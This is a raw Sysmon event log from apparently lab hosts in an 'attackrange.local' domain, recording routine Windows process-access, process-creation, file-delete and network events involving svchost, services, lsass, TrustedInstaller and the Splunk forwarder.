07:57:03.157{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050844Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:03.157{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050843Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.157{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050842Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:03.142{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F5CF-60EB-717D-00000000CF01}1908C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050841Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.142{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F5CF-60EB-717D-00000000CF01}1908C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050840Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.141{466BC892-F5CF-60EB-717D-00000000CF01}1908C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe10.0.14393.4222 (rs1_release.210113-1739)Windows Modules Installer WorkerMicrosoft® Windows® Operating SystemMicrosoft 
CorporationTiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=1571A4132449A317F66DF783E9468783,SHA256=5CFF48937FAE7F0CF5935248959141E2A60E88FE8105C43676B866FDAC36ADD2,IMPHASH=38FF53C1CCC1EE4C508C0F83A88C4E19{466BC892-02AF-60E8-0C00-00000000CF01}844C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000001050839Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.126{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F5CF-60EB-707D-00000000CF01}1196C:\Windows\servicing\TrustedInstaller.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050838Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:03.079{466BC892-02AD-60E8-0A00-00000000CF01}6162696C:\Windows\system32\services.exe{466BC892-F5CF-60EB-707D-00000000CF01}1196C:\Windows\servicing\TrustedInstaller.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050837Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.026{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050836Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:03.026{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050835Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.026{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050834Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:03.026{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050833Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.026{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F5CF-60EB-707D-00000000CF01}1196C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050832Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:03.026{466BC892-02AD-60E8-0A00-00000000CF01}6164268C:\Windows\system32\services.exe{466BC892-F5CF-60EB-707D-00000000CF01}1196C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050831Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.017{466BC892-F5CF-60EB-707D-00000000CF01}1196C:\Windows\servicing\TrustedInstaller.exe10.0.14393.3564 (rs1_release.200303-1942)Windows Modules InstallerMicrosoft® Windows® Operating SystemMicrosoft CorporationTrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=187076E4BC7B2F5FB7D54D1234B3CDEA,SHA256=7AE4CC64E2F0E5C58ABB6542233DA78B9AEAAD22C9D853AB96265EF3FBFEFABE,IMPHASH=648F735E453FC6802BFAECAC5ACA72A4{466BC892-02AD-60E8-0A00-00000000CF01}616C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001050830Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:03.011{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-02AD-60E8-0A00-00000000CF01}616C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050829Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.011{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001050828Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.011{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050827Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:03.011{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-02AD-60E8-0A00-00000000CF01}616C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
23542300x8000000000000000808423Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:04.778{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95790824DD7BA9EC43360E06A88CEBAA,SHA256=C4F3FA7AF488753F982926C5EAA5F5CD2A0829D4F3928654FC7D7171ED1215F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050853Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:04.292{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=423FDA72D5CDCBF93B861DCC9857432B,SHA256=2DC4F186AFCA06993E88F2F8430466E20BB7A0FB66E755BBEE36A30096AB52B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050852Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:04.141{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=B5E72A778217DAF240E862475033D9B1,SHA256=C7702984BB53EE8A203D308F9D19DEC496641AC4FE2DDA79A838488141B64938,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050851Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:04.140{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=6AED793FDBDBE09A70298BD1009B0027,SHA256=0D89947F51C053AD44657DCA96066C3183F216A0463CCD0E0F766E37999B024A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050850Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:04.017{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=25E96984E39276257D75DE0288304F2F,SHA256=80F7B2DEAEBA6E0632926426243575DB49AE73C3A6F9A27FD9EAC104A3E7C670,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808424Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:05.793{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3AE6B32D47D222F22908CADEAAE56AE,SHA256=821D4D3F5C2EC61CB35288FAEC737D33CA488E190D5977A5BC16115A88931A62,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050864Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:57.752{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51094-false10.0.1.12-8000- 10341000x80000000000000001050863Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:05.506{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program 
Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\ole32.dll+8a360|C:\Windows\System32\ole32.dll+8c46e|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8c3d|C:\Windows\System32\SHELL32.dll+28385e|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced|C:\Windows\system32\explorerframe.dll+1ac26|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+5888a 10341000x80000000000000001050862Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:05.385{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\ole32.dll+8a360|C:\Windows\System32\ole32.dll+8c46e|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8c3d|C:\Windows\System32\SHELL32.dll+28385e|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced|C:\Windows\system32\explorerframe.dll+1ac26|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+5888a 